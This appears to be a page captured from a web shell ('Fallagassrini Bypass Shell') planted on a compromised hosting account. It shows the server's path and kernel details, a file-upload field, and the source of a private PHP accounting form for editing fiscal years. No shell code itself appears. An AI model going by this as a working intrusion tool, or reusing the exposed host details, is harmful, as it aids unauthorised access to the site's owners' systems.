? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sgms/application/views/Accounting/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sgms/application/views/Accounting/edit_fiscal_year.php

<?php  
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>
<div class="select-bar">
    <label><img src="<?=base_url()?>assets/images/backbutton.png" title="Back" class="clickimage" onclick="viewdata('accounting','viewinaccountingsearch','search_fiscal_year','view_fiscal_year','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="25" height="25"  />
    </label>
    <span class="heading">Update fiscal year</span>
</div>

<fieldset>
    <?php
        $attributes=array('id'=>'validateform','class'=>'customForm');
        echo form_open('accounting/addinaccounting/update_fiscal_year/view_fiscal_year/1',$attributes);
    ?>
    <ul>
        <li>
            <label for="data">Start Date</label>
            <input type="text" name="fiscal_year_start" id="fiscal_year_start" value="<?=$viewinfo->fiscal_year_start;?>" class="required calfocus" />
        </li>
        
        <li>
            <label for="data">End Date</label>
            <input type="text" name="fiscal_year_end" id="fiscal_year_end" value="<?=$viewinfo->fiscal_year_end;?>" class="required calfocus"   />
        </li>
       <li>
            <label for="data">Closed?</label>
            <select name="closed">
                <option value="0" <?php if($viewinfo->closed=='0'){echo 'selected';}?>>No</option>
                <option value="1" <?php if($viewinfo->closed=='1'){echo 'selected';}?>>Yes</option>
            </select>
        </li>
        
        <li>
            <input type="hidden" name="tab_name" value="fiscal_year"/>
            <input type="hidden" name="fiscal_year_id" value="<?=$viewinfo->fiscal_year_id;?>"/>
            <input type="hidden" name="resfunction" value="search_fiscal_year"/>
            <label for="submit">&nbsp;</label>
            <button type="submit" id="submit" class="clickimage" onclick="addformdata('validateform')">Save</button>
        </li>
    </ul>
<?php echo form_close();?>
</fieldset>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net